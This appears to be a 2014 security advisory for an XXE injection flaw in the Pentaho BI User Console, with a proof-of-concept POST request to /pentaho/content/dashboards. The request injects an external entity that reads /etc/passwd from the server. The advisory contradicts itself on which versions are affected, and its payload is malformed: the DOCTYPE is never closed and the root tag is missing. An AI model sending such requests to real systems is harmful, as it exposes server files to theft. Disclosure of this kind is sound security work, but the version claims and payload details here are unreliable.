title: Pentaho User Console XML Injection Vulnerability
program: Pentaho BI User Console
vulnerable version: Pentaho < 4.5.0
homepage: http://www.pentaho.com/
Tested on: Linux x86/x86_64
found: Feb. 5 2014
Original Discovery by: Taylor Tippins
Exploit By: K.d Long kd@stonedcoder.org
Vendor description:
The Pentaho Business Analytics suite manages Business Intelligence solutions, generate the reports,
data aggregation, and provides users access to analysis views.
Vulnerability description:
The dashboardXml parameter is vulnerable to XML external entity injection. The tag <!DOCTYPE foo
[<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]> was injected into the XML of the client's POST
request. This tag defines an external entity, xxe8295c, which references a file on the XML parser's
filesystem. This entity was then used within a data field in the XML document. The server's response
contains the contents of the specified file, indicating that the parser processed the injected
external entity.
By manipulating the POST request to “/pentaho/content/dashboards” it is possible to inject arbitrary
XML declarations- and tags. This request is triggered while a user is creating a customized dashboard.
Proof of concept:
The following entity declaration would create a new XML entity with the content of the /etc/passwd
file which can be referenced in the following XML request content:
---cut here---
POST /pentaho/content/dashboards HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: https://example.com/pentaho/content/dashboards?command=new
Cookie: loginNewWindowChecked=false; JSESSIONID=61448378278C147D05BC95BAB4B63F19
Content-Length: 2458
Connection: keep-alive
command=templatecontents&dashboardXml=<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd">
<title>New Dashboard</title>
<heading>New Dashboard</heading>
<box id="Panel_1" pho:title="Untitled 1" type="titled-panel"flex="1"collapsed="false" />
<box id="Panel_2" pho:title="Untitled 2" type="titled-panel"flex="1"collapsed="false" />
<box id="Panel_3" pho:title="Untitled 3" type="titled-panel"flex="1"collapsed="false" />
<box id="Panel_4" pho:title="Untitled 4" type="titled-panel"flex="1"collapsed="false" />
<box id="Panel_5" pho:title="Untitled 5"/>
<box id="Panel_6" pho:title="Untitled 6"/>
<box id="Panel_7" pho:title="Untitled 7"/>
<box id="Panel_8" pho:title="Untitled 8"/>
<box id="Panel_9" pho:title="Untitled 9"/>
<box id="Panel_10" pho:title="Untitled 10"/>
<box id="titlebar" title="" height="23"hidden="false"width="0"type="pagetitle"
collapsed="false" /><box id="widget-area" type="scrollarea"/><box id="widget-area" flex="1"/><box
id="FilterPanel" title="" height="100"hidden="true"width="0"type="povpanel"collapsed="false"
/><box id="hbox1" type="layout"/><box id="hbox1" flex="1"/><box id="hbox2" type="layout"/><box
id="hbox2" flex="1"/></overlay>
---cut here---
Vulnerable versions:
Pentaho User Console Release 4.5.0.GA.49857
Vendor contact timeline:
02/16/2014: Vendor notified via email